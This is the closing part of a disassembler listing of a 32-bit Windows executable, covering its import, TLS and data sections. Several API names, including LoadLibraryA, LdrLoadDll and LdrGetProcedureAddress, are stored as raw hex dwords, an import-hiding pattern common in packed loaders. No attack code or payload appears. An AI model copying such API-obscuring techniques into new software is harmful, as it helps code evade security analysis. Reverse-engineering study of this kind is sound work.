aSysfreestring db 'SysFreeString',0
align 10h
aSysallocstring db 'SysAllocStringLen',0
aKernel32_dll_0 db 'kernel32.dll',0
align 10h
dd 6C540000h, 74655373h, 756C6156h, 65h, 47736C54h, 61567465h
dd 65756Ch, 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aKernel32_dll_1 db 'kernel32.dll',0
align 4
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 65470000h, 6D6F4374h
dd 646E616Dh, 656E694Ch, 41h, 74697845h, 636F7250h, 737365h
dd 6C64746Eh, 6C642E6Ch, 6Ch, 496C7452h, 5574696Eh, 6F63696Eh
dd 74536564h, 676E6972h, 0
aRtlinitstring db 'RtlInitString',0
align 10h
aLdrloaddll db 'LdrLoadDll',0
align 4
dd 644C0000h, 74654772h, 636F7250h, 72756465h, 64644165h
dd 73736572h
align 200h
_idata ends
; Section 5. (virtual address 00009000)
; Virtual size : 00000008 ( 8.)
; Section size in file : 00000008 ( 8.)
; Offset to raw data for section: 00009000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 409000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd 2 dup(0) ; DATA XREF: .rdata:TlsDirectory�o
TlsEnd dd 7Eh dup(?) ; DATA XREF: .rdata:TlsEnd_ptr�o
_tls ends
; Section 6. (virtual address 0000A000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 0000A000
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40A000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
align 200h
_rdata ends
; Section 9. (virtual address 00023000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00022A00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 423000h
align 2000h
_idata2 ends
end start